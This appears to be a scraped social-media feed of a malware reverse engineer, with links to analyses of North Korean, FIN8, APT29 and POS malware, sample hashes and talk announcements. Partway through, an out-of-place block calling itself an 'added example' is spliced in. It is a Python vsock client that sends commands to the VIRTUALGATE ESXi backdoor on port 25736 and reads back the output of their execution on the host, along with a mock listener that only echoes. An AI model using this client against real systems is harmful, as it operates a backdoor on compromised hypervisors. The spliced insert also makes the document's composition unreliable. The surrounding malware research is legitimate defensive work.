RE and CTI. Feel free to take a gander at my past presentations: norfolkinfosec.com/presentat…

Joined January 2011
Some North Korean post infection malware. Nothing groundbreaking, I just always like to see the actual code when vendors gloss over it: norfolkinfosec.com/north-kor… I’ve included hashes where the files were on VT, if you want to grab them to look for yourself.
Some notes and testing on (what I think is) a #VIRTUALGATE sample, following Mandiant's ESXI report: norfolkinfosec.com/some-note… MD5 3c7316012cba3bbfa8a95d7277cda873 -Opens VMCI listener on 25736 -Listens -Runs what it receives via cmd Post shows RE how to test it. Cool malware
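The tweet above describes the sample's behaviour (VMCI listener on port 25736, input handed to cmd) but not the test harness. The block below is an added example, not code from the norfolkinfosec post or from the sample: a guest-side vsock client for reaching such a listener, plus a loopback stand-in so the same code runs offline. Assumptions labelled in the code: that the listener takes a raw newline-terminated string (the tweet does not state framing) and that it returns command output on the same connection. The mock listener only echoes, it executes nothing.

```python
import socket
import threading

# Port reported in the tweet. Framing is an assumption: the tweet only says the
# sample "runs what it receives via cmd", so a trailing newline is added here.
VIRTUALGATE_PORT = 25736
VMADDR_CID_HOST = 2  # standard vsock context ID for the hypervisor/host


def send_command(cmd: str, connect_args, family=None, timeout=5.0) -> bytes:
    """Connect to a listener, send cmd, and return whatever bytes come back.

    family defaults to AF_VSOCK (Linux guests); pass AF_INET for the loopback
    stand-in used in demo()."""
    if family is None:
        family = socket.AF_VSOCK
    with socket.socket(family, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect(connect_args)
        s.sendall(cmd.encode() + b"\n")
        chunks = []
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
        return b"".join(chunks)


def send_to_virtualgate(cmd: str) -> bytes:
    # From inside a guest VM on the ESXi host: vsock to CID 2, port 25736.
    # Assumption: the listener replies with cmd output on the same socket.
    return send_command(cmd, (VMADDR_CID_HOST, VIRTUALGATE_PORT))


def start_mock_listener() -> tuple:
    """Loopback TCP stand-in for offline testing (constructed, not the real
    sample). It reads one line and echoes it back prefixed with 'ran: '
    instead of executing anything."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            buf = b""
            while not buf.endswith(b"\n"):
                data = conn.recv(4096)
                if not data:
                    break
                buf += data
            conn.sendall(b"ran: " + buf.rstrip(b"\n"))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


def demo() -> bytes:
    """Drive the client against the loopback stand-in."""
    addr = start_mock_listener()
    return send_command("whoami", addr, family=socket.AF_INET)


if __name__ == "__main__":
    print(demo())  # b'ran: whoami'
```

Against the real sample, send_to_virtualgate() only works from a guest whose VMCI/vsock device is enabled and whose kernel exposes AF_VSOCK; run it in an isolated lab, since anything sent is executed on the host side.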
Kevin Perlow retweeted
.@MITREattack v9 is out!!! A big shout out 🙌 to @patrickwardle, @thomasareed, @its_a_feature_ , and @xorrior for helping us update changes to macOS🍎. There is more to come...but let's take a moment to appreciate my new favorite gif, which summarizes this release perfectly!
29 Apr 2021
It has launched! ATT&CK v9 is now live with refactored data sources, ATT&CK for Containers, Google Workspace as a platform and more! Read about new data sources and the rest of the update at medium.com/mitre-attack/atta… or attack.mitre.org/resources/u… for new/changed groups/techniques/sw.
Also, my personal favorite talk from the conference was from @JamesPavur - A fantastic presentation on eavesdropping on satellite internet conversations. youtu.be/d5Sbwlu6f8o No technical satellite knowledge required (I barely know how they get up there)
They put our BlackHat videos up the other day! :) It's a bit old now, but if you want to see how #Lazarus used ISO-8583 for the #FASTCash malware in past years, here's the URL: youtu.be/zGvQPtejX9w Feedback is always welcome - presenting to a glowing orb was not the easiest.

Last #Lazarus #ZINC update: a source gave me the missing registry data (~2mb reg entry). Sorry for the spam... have to do this after hours. Updated w/ brief analysis of Stage 2: norfolkinfosec.com/dprk-targ… Screengrab, process launching, recon etc. That's it from me for a while :)
Part II: Looking at the #DPRK /#Lazarus/#ZINC .sys malware targeting security researchers, with a hunt hypothesis as the highlight: norfolkinfosec.com/dprk-targ… Note that I *don't* have the Stage 2 registry data. Would love to see it if someone has a copy!
A look at some of the malware mentioned in this Google TAG research. norfolkinfosec.com/dprk-malw… - Two-stage (payload in ProgramData) - AV Check (Kasp, Avast) - Basic Persistence - Multiple C2s per payload More to be done re:C2 comm (unless someone does it first) #DPRK
New blog post from TAG with details of a North Korean campaign targeting security researchers working on vulnerability research and development. blog.google/threat-analysis-… Stay safe out there everyone!
Interesting possible relationship between #TinyPOS #ProLocker norfolkinfosec.com/tinypos-a… I lean towards, "would make sense if it's the same group," but far from definitive. Was trying to find infrastructure. @DrunkBinary (for the hashes) @cyb3rops (for code segments and YARA)
Really awesome to be included in part of the Wired write-up! 🙂 For folks looking for the slides and whitepaper, both are linked here: norfolkinfosec.com/presentat… Whitepaper has a summary of tool relationships from the #FASTCash adversary and some extra RE.

"What has fundamentally changed between when Barnaby Jack presented and now?" @angcui wired.com/story/atm-hackers-…
Kevin Perlow retweeted
LOVING the live Q&A *DURING* the #BHUSA session with @KevinPerlow on financial malware. Learning lots.
Looking back at LiteDuke (#APT29/#CozyDuke): norfolkinfosec.com/looking-b… Found a copy and wanted to do some RE to build on @ESETresearch's previous great work. Post includes deeper dive into the available commands and some of the techniques used.
Unpacked payload: virustotal.com/gui/file/391b… Remember, this is old malware (late 2014). That being said, I *do* think it has some really interesting components. Was worth at least going down the rabbit hole.

My April Fool's present: Incident Response, the "Bored" Game. Please verb responsibly. @DrunkBinary @VK_Intel @magerbomb @jdenne79 *Might be worth playing with blank squares and a "dungeon master" who tracks the rolls and reads the squares.
Golang walkthrough - A look back at some old (2017) #Dragonfly / #DYMALLOY "Goodor" using newer tools: norfolkinfosec.com/a-new-loo… Always how Goodor *actually* worked. Redress from @joakimkennedy helps answer that question. CC @DrunkBinary
Analysis of #FIN8 #PoSlurp payload relevant to VISA fuel pump report (incident 2): norfolkinfosec.com/fuel-pump… I put the payload on VT (for static analysis): 3d5ae56c6746e0b3ed5b15124264a0d2 Credit to @just_windex for initial shellcode. cc @DrunkBinary @cyb3rops for tracking/sigs
I wanted to supplement other research out there re:#PoSlurp. Some thoughts: - LOTS of exit checks - Seems to need env variable to specifically be set via PowerShell - Different approach by targeting a specific process - Interesting registry references (likely persistence)
Analysis of #FrameworkPOS/#GratefulPOS file reported by @VisaSecurity (Incident1) norfolkinfosec.com/pos-malwa… Of note-Not sure people's public RE of this smaller file has been accurate. No obvious DNS in this DLL, and memscrp.stp is just an off switch. Details in post @DrunkBinary
Non-DNS:
32ccf851b0b81252aa2bfdf2e8b416cb
0eb7ac6d2d99d702ecc8b86ff90b0aac
576039d7cb54b749af5ed3d3558ee296
DNS:
0576380f93f49279491177d96d84ad7e
353b0df3a9efce2d32f6097cab8fffc3
128f75f8c80d65d416c740a6d4c1591e
4ed6cc403d5ea6abae458ba6f43ad4f3
To be clear, VISA's writeup is fine. I've just seen commentary elsewhere about the non-DNS files above doing DNS, and after a lot of hours, analysis suggests it's not there. Happy to update the post if I'm wrong. Maybe people just referenced the wrong hashes by mistake.